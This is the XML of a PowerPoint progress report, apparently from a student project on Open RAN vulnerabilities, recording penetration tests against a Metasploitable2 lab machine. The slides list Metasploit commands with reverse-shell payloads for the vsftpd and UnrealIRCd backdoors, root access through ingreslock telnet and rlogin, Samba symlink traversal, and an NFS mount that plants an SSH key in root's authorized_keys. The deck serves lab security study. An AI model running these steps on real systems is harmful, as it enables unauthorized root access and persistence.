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312" r:id="rId4"/>
    <p:sldId id="304" r:id="rId5"/>
    <p:sldId id="309" r:id="rId6"/>
    <p:sldId id="313" r:id="rId7"/>
    <p:sldId id="305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03" r:id="rId16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 snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="89" d="100"/>
          <a:sy n="89" d="100"/>
        </p:scale>
        <p:origin x="13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88042"/>
            <a:ext cx="4964112" cy="446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5362" y="266299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39" y="6228123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865362" y="95650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26.11.2022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55477" y="6234644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09588"/>
            <a:ext cx="2555875" cy="191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865362" y="110867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26.11.2022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55477" y="6067256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277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70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477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59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59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43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01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443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258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06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797859" y="4090479"/>
            <a:ext cx="8651221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Investigation of Vulnerabilities in Open RAN Implementations</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US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82154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Research Project – WS 22/23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meeting-06 (23.11.2022)</a:t>
            </a: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3563029" y="563329"/>
            <a:ext cx="2351361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IRC Backdoor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3367402" y="1702435"/>
            <a:ext cx="547433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port 6667, Metasploitable2 runs the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>UnreaIRCD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> IRC daemon.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version contains a backdoor that went unnoticed for months - triggered by sending the letters "AB" following by a system command to the server on any listening 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Command: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/>
              <a:t>msfconsole</a:t>
            </a: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use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>irc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/unreal_ircd_3281_backdoor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set RHOSTS 10.0.2.7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set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>reverese</a:t>
            </a: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set LHOST 10.0.2.15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A7DF-9827-3BE9-5970-3F1CA5885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88" y="1899134"/>
            <a:ext cx="2591025" cy="42309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4FDEBD-35E2-0348-7B71-EA6FFC728EB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619624" y="4874253"/>
            <a:ext cx="1574953" cy="16715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476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769440-05EB-CF05-1207-02DF7D5A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0"/>
            <a:ext cx="7973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9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3563029" y="563329"/>
            <a:ext cx="2351361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3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IngreslockBackdoor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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3367402" y="1702435"/>
            <a:ext cx="54743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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Ingreslock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>" backdoor that is listening on port 1524.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Command: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telnet 10.0.2.7 1524 (By this command we get the root access of the vulnerable machine.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A7DF-9827-3BE9-5970-3F1CA5885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88" y="1899134"/>
            <a:ext cx="2591025" cy="42309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4FDEBD-35E2-0348-7B71-EA6FFC728EB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793078" y="3763895"/>
            <a:ext cx="1889737" cy="16715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59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3288213" y="541174"/>
            <a:ext cx="3112378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Unintentional Backdoor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5884636" y="1997839"/>
            <a:ext cx="31123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addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature.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of which installed on Metasploitable2 is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>distccd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Command: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Similar as FTP and IRC backdoor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7ABCE-4060-F893-EF76-315950E06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06" y="1976571"/>
            <a:ext cx="5235475" cy="4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3288213" y="541174"/>
            <a:ext cx="3112378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Samba</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr"/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Backdoor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1355767" y="2290314"/>
            <a:ext cx="75639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Samba, when configured with a writeable file share and "wide links" enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared.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Command: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Similar as FTP and IRC backdoor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/>
              <a:t>smbclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> -L //10.0.2.7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/>
              <a:t>msfconsole</a:t>
            </a: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use auxiliary/admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>samba_symlink_traversal</a:t>
            </a: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set SMBSHARE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a: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exploit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/>
              <a:t>smbclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1"/>
              <a:t>//10.0.2.7/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a: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0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Next Steps (Week 7) (Until 01.12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.2022)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AF41F-3424-9D0E-29E6-3273EA5AA1EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="854015" y="1595887"/>
            <a:ext cx="8033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Kali Linux pen-testing (Rest of the attacks)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Weak passwords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Attacks against databases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Vulnerable web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Create a docker container in a VM and using Kali Linux apply some backdoor attacks with Metasploit frameworks.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Create some attack in that container through the Atomic red team tool (using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Mitre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> attack ID)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3330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5 Meeting (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>17.11.2022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400" dirty="0"/>
              <a:t>Install Infection monkey (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>Need AWS subscription, don’t continue anymore!!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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4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738461"/>
            <a:ext cx="80914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200" b="1" dirty="0"/>
              <a:t>Week 6 Meeting (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>23.11.2022 - 11:00am</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="3200" b="1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02413-8A17-AC95-3F39-717CCEFED823}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="810883" y="1500996"/>
            <a:ext cx="7539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security lab 2 complete (Partially)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Kali Linux penetration testing experience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SSH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 backdoor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IRC Backdoor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Ingreslock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Backdoor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distccd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Backdoor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Samba Backdoor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passwords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against databases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Vulnerable web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to learn docker (from Chapter 3 - Containers and images)</a:t>
            </a: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1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738461"/>
            <a:ext cx="809148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Kali Linux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354E5-9E7C-FE34-8D45-7856A29746A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692207" y="1414732"/>
            <a:ext cx="7951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Metasploit Framework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A penetration testing framework by open source community and rapid 7 group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Verify vulnerabilities, manage security assessments, and improve security awareness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In Kali Linux, Metasploit tool is pre-installed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Metasploit uses PostgreSQL as its database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Command (to setup database for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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udo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start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postgresql.service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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udo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enable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postgresql.service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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udo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msfdb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Command (to start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>metaploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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msfconsole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5" name="Graphic 4" descr="Television with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52D3AF32-16FB-09F7-0CF8-C585A7720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8" name="Graphic 7" descr="Television with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B91B0BB-7F9C-38F5-BF27-13C221DFA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B58B76-7C59-13E5-A1FC-52CBB1CEB97F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F5AC70-CC7D-95DB-8DA6-4455DA90A5B6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0F44B-C02E-97C1-20D5-9C72EFC99B10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448F0-F77A-4087-A2E6-D49D225404AD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AB802-8634-76A6-FC50-03E287F1C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8" y="1722300"/>
            <a:ext cx="2591565" cy="4234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F789B9-B8F5-04D7-BD98-213CFEC5E888}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3695001" y="36133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Rogin</a:t>
            </a:r>
            <a:endParaRPr lang="en-DE" sz="3600" b="1" dirty="0" err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317A0-3578-A24B-C99C-4050CB103815}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6668219" y="3071004"/>
            <a:ext cx="1484044" cy="42269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EFF15-6391-7E92-58F4-ADA20254E5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42" y="1959896"/>
            <a:ext cx="4315887" cy="1930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848069-059C-73BC-13FE-B4D0A0E749FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="417792" y="4090914"/>
            <a:ext cx="5741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rlogin –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>l root 10.0.2.7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TCP ports 512, 513, and 514 are called as r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command from any host anyone can get root access to the target machine through this open ports.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D392C8-865A-A821-5D01-AB290E18C688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="339216" y="3698413"/>
            <a:ext cx="1367876" cy="22065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768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4068551" y="616788"/>
            <a:ext cx="112796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3566146" y="1868941"/>
            <a:ext cx="5417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File System (NFS) can be identified by probing port 2049.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Command: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rpcinfo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–p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>10.0.2.7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>showmount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> –e 10.0.2.7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-keygen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-add</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/r00t</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>mount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>nfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> 10.0.2.7:/ /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>/r00t/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cat ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/id_rsa.pub &gt;&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/r00t/root/.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authorized_keys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 err="1"/>
              <a:t>umount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/r00t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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>PubkeyAcceptedKeyTypes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ssh-rsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>HostkeyAlgorithms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ssh-rsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>     root@10.0.2.7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1FFF4A-2EE2-0E91-FF0A-00F9A1B0C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16" y="1920420"/>
            <a:ext cx="3314700" cy="39814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4FDEBD-35E2-0348-7B71-EA6FFC728EB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1318578" y="3028209"/>
            <a:ext cx="1709294" cy="40079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528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3563029" y="563329"/>
            <a:ext cx="2351361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 Backdoor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3367402" y="1702435"/>
            <a:ext cx="54743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port 21, Metasploitable2 runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>vsftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, a popular FTP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particular version contains a backdoor that was slipped into the source code by an unknown intruder.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exploit this using Metasploit framework, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> is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Command: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/>
              <a:t>msfconsole</a:t>
            </a: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use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/ftp/vsftpd_234_backdoor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set RHOSTS 10.0.2.7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set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>reverese</a:t>
            </a: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set LHOST 10.0.2.15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6A7DF-9827-3BE9-5970-3F1CA5885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88" y="1899134"/>
            <a:ext cx="2591025" cy="42309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4FDEBD-35E2-0348-7B71-EA6FFC728EB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="776377" y="2018910"/>
            <a:ext cx="1574953" cy="16715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B4D05-7449-84BC-7BF5-A1680EA4A8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0760" y="4702737"/>
            <a:ext cx="3996190" cy="20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328F6-EAAC-30FF-0C75-81BF996D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291356"/>
            <a:ext cx="7867291" cy="62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782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966</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>148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Masterfolien ohne Erklärung_4_3_neu</vt:lpstr>
      <vt:lpstr> Investigation of Vulnerabilities in Open RAN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84</cp:revision>
  <cp:lastPrinted>2018-03-07T15:14:31Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-10-18T12:05:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-26T22:45:56Z</dcterms:modified>
</cp:coreProperties>
</file>